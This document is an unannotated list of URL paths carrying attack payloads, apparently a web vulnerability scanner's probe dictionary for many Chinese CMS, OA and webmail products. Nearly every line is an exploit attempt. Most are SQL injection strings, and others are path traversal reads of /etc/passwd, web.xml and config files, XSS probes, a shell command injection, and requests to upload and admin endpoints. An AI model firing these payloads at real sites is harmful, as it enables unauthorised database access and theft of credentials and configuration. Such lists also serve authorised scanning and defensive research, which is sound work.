/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/mod/payment/quest.php?op=check&page=b2b
/mod/ntga/jwsview.php
/uploadd.php
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/admin/backup.aspx
/mod/mad/video_upload.php
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/frontProduct/search.ac
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/framework/dbfile/createdbfile.jsp
/CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/backup/backup/backup.asp
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/download?fileName=/WEB-INF/web.xml
/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/index_lnlqcj.php
/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/information/OA_InforList.asp
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
/public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
/public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/mailClassInfor.asp
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
/tophp.asp
/Manage/CalendarMemo/event.ashx
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/kaoqin/JiaoYanDis.asp
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Manage/CalendarMemo/load.ashx
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/include/config.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/user/storage_explore.php
/grad/admin/domain_logo.php
/user/storage_fold_explore.php
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/user/send_queue/upload_addition.php
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/grad/admin/admin_logo_upload.php
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/download.ashx?files=../web.config
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/download.jsp?path=UserFiles/../download.jsp
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/jis/interface/offer.jsp?flag=user
/jis/down.jsp?pathfile=./down.jsp%00.jpg
/MockLogin.aspx
/mobile/user.php?act=order_list
/seeyon/management/status.jsp
/api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
/monitoring?part=web.xml
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/download.action?fullPath=./WEB-INF/web.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jis/update/update.jsp?fn_billstatus=U
/install/install.php
/public/minify.php?f=../ooxxooxxo/hehe.js
/admin/index.asp
/plus/outside.php?id=../template/default/style/yun_index.css%00
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jcms/m_5_5/m_5_5_3/import.jsp
/upload!uploadImg.action
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/?do=index&mod=goods
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/plugins/phpdisk_client/client_sub.php?action=upload_file
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/Web/Login.aspx
/Web/KeySearch.aspx?searchid=1234
/portal/admin/setright.aspx?id=-1
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/prog/filedown.php?pe_id=MQ==
/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
/emlib4/format/release/aspx/eml_userwh.aspx
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/Tools/stream/FlvStream.ashx?file=./Index.aspx
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/mydocument/download.aspx
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/jis/front/sdgs/updateuser.jsp
/lm/down.jsp?pathfile=down.jsp
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/meetingroom/MeetingRoom_UseInfo.asp
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/downloadFile.action?path=index.jsp
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/php/bill/print_addfeelog.php
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
